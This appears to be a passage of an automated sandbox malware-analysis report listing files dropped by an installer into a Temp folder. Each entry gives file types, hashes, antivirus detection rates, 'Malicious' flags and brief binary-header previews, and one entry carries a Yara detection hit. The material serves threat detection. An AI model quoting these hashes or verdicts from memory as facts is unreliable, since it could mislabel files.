                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):248680
                                                                                    Entropy (8bit):4.820760286569876
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
                                                                                    MD5:60BAB1D197D91828ED25099968F7D8C5
                                                                                    SHA1:FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
                                                                                    SHA-256:F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
                                                                                    SHA-512:5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):135016
                                                                                    Entropy (8bit):5.674566205873397
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
                                                                                    MD5:61CF5C843D8A31162B59C074AE74A76E
                                                                                    SHA1:123E0EACE3DD60FEF94DC96215468D22434C50FB
                                                                                    SHA-256:F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
                                                                                    SHA-512:AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY*.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.......*..................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):320120
                                                                                    Entropy (8bit):6.398399631689542
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
                                                                                    MD5:DB19F6E0A1BB5DB1C8D87C3FE0891136
                                                                                    SHA1:3B2DAB478A8268000EF5E4474D52CB71F9EB615E
                                                                                    SHA-256:7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
                                                                                    SHA-512:B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):20840
                                                                                    Entropy (8bit):6.3244920295043645
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
                                                                                    MD5:D2BC90D6AF120A0643AD5DC5F3CE8D43
                                                                                    SHA1:419C3246B08125754CCBB4323DD823F8DA0548CB
                                                                                    SHA-256:BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
                                                                                    SHA-512:F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb*)%./(yb+)#./(yb,)(./(?|.)../(+..(../(.b*)*./(.b/)*./(.b.(*./(.b-)*./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):248680
                                                                                    Entropy (8bit):4.820760286569876
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
                                                                                    MD5:60BAB1D197D91828ED25099968F7D8C5
                                                                                    SHA1:FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
                                                                                    SHA-256:F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
                                                                                    SHA-512:5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):51
                                                                                    Entropy (8bit):3.48286657951254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
                                                                                    MD5:034D89CD2C41EDFCEADA9F96A3C0A56A
                                                                                    SHA1:92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
                                                                                    SHA-256:44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
                                                                                    SHA-512:6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
                                                                                    Malicious:false
                                                                                    Preview:1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):963232
                                                                                    Entropy (8bit):6.634408584960502
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
                                                                                    MD5:9C861C079DD81762B6C54E37597B7712
                                                                                    SHA1:62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
                                                                                    SHA-256:AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
                                                                                    SHA-512:3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):31528
                                                                                    Entropy (8bit):6.472533190412445
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
                                                                                    MD5:7EE2B93A97485E6222C393BFA653926B
                                                                                    SHA1:F4779CBFF235D21C386DA7276021F136CA233320
                                                                                    SHA-256:BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
                                                                                    SHA-512:4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):660128
                                                                                    Entropy (8bit):6.339798513733826
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
                                                                                    MD5:46060C35F697281BC5E7337AEE3722B1
                                                                                    SHA1:D0164C041707F297A73ABB9EA854111953E99CF1
                                                                                    SHA-256:2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
                                                                                    SHA-512:2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):135016
                                                                                    Entropy (8bit):5.674566205873397
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
                                                                                    MD5:61CF5C843D8A31162B59C074AE74A76E
                                                                                    SHA1:123E0EACE3DD60FEF94DC96215468D22434C50FB
                                                                                    SHA-256:F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
                                                                                    SHA-512:AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY*.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.......*..................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):590632
                                                                                    Entropy (8bit):6.463330275333709
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
                                                                                    MD5:E74CAF5D94AA08D046A44ED6ED84A3C5
                                                                                    SHA1:ED9F696FA0902A7C16B257DA9B22FB605B72B12E
                                                                                    SHA-256:3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
                                                                                    SHA-512:D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*...*...*.....w.(...#...<...*......./.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):213112
                                                                                    Entropy (8bit):6.331143352918189
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
                                                                                    MD5:63D91B407A350DA5CE19B5D79924B1F4
                                                                                    SHA1:45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
                                                                                    SHA-256:22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
                                                                                    SHA-512:FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):331384
                                                                                    Entropy (8bit):6.387255143196498
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
                                                                                    MD5:C3424F2D3D26632C341EF2F542AEA36B
                                                                                    SHA1:30640EBFF046085DBA3BD0877DE8A90886BED945
                                                                                    SHA-256:FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
                                                                                    SHA-512:72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1297
                                                                                    Entropy (8bit):5.115489615345492
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
                                                                                    MD5:AAF4009F5963B1B270D8C3E697EBE442
                                                                                    SHA1:F5A44235094DA0B8B5992C6112CB8C356EF22B93
                                                                                    SHA-256:3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
                                                                                    SHA-512:BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):707354
                                                                                    Entropy (8bit):6.470926417661749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:D0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8z:nfKbT5lrPo37AzHTA63/cfU9IEU953fo
                                                                                    MD5:F2E1861AB7EFD6358283CF101045A727
                                                                                    SHA1:15F34DC254FE02A84F2F8AD4D5495D7E799F2F9B
                                                                                    SHA-256:35A50C7721675C5422D5F7979912FB1B2BE5811CBBAFBA60FEA36D2DBBC87190
                                                                                    SHA-512:C92F41CEFDEC7305C526F5903509760512F9DC152AFC2969F40B40ACABDAD41CF40273BAC8CEECBA47C4BC0DACDA14D0DA74B8312AFFF37CFADBD8EF8933C685
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.794411160720888
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:i5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:i5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:4C9BEC9E2BD8F9AEDA07A75F84765891
                                                                                    SHA1:42E26A9C1BA81B355525318BF49E5F44470BA666
                                                                                    SHA-256:CB4626F720592DF58CA049CDD31CB03D769735C431428DA340421B2677A13915
                                                                                    SHA-512:851243C518F56F7B38ABD56E7A39BA0418685C354345FFB4490B489584AD08D474E001799F4E17421EFF23D6E177EF108CB78CB9EFC0893C10949A11DDB97938
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp, Author: Joe Security
                                                                                    Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):869224
                                                                                    Entropy (8bit):6.632387605957213
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
                                                                                    MD5:DAA904CE63B0A290111AED5E843B9368
                                                                                    SHA1:6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
                                                                                    SHA-256:471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
                                                                                    SHA-512:CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):469624
                                                                                    Entropy (8bit):6.027128925039679
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
                                                                                    MD5:820FFF478DC5F2C2D5F03A5DB9187FBC
                                                                                    SHA1:BD58AA8596345C837E1743617452EC7D73013F3A
                                                                                    SHA-256:3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
                                                                                    SHA-512:1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2042352
                                                                                    Entropy (8bit):7.085275197144553
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
                                                                                    MD5:876A839023B8F962A72D295DA7495734
                                                                                    SHA1:62A7728679BC18784B1FBF1D013F7CECE18CBEC9
                                                                                    SHA-256:A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
                                                                                    SHA-512:E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):363880
                                                                                    Entropy (8bit):6.3947346615222305
                                                                                    Encrypted:false
